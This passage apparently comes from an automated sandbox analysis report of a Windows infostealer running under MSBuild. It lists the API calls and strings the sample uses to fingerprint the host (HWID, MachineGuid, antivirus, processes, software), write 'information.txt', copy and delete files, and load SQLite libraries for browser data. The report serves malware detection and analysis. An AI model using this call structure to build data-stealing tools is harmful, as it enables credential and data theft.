                                                                                                                                                                                                                        • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                                                                        • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                                                                        • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                                                                        • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                                                                        • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                                                                        • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                                                                        • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                                                                        • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                                                                                                                        • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                                                                        • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                                                                        • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                                                                        • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                                                                        • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                                                                        • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                                                                        • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                                                                        • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                                                                        • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                                                                        • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                                                                        • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                                                                        • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                                                                                                                        • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                                                                                                                        • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                                                                                                                        • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                                                                                                                        • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                                                                                                                        • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                                                                                                                        • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                                                                        • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                                                                        • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                                                                        • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                                                                        • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                                                                        • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                                                                        • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                                                                                                                        • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                                                                                                                        • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                                                                                                                        • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                                                                                                                        • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                                                                        • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                                                                        • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                                                                        • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                                                                        • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                                                                                                                        • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                                                                        • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                                                                        • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                                                                        • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                                                                        • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                                                                        • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                      • API String ID: 3634126619-1014693891
                                                                                                                                                                                                                      • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                                                                                      • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                                                                                                                        • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                                                                                                                        • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                                                                                                                        • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                                      • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                                                                      • API String ID: 2819533921-2709115261
                                                                                                                                                                                                                      • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                                                                                      • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                                                                        • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                      • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                                                      • API String ID: 2840494320-4129404369
                                                                                                                                                                                                                      • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                                                                                      • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
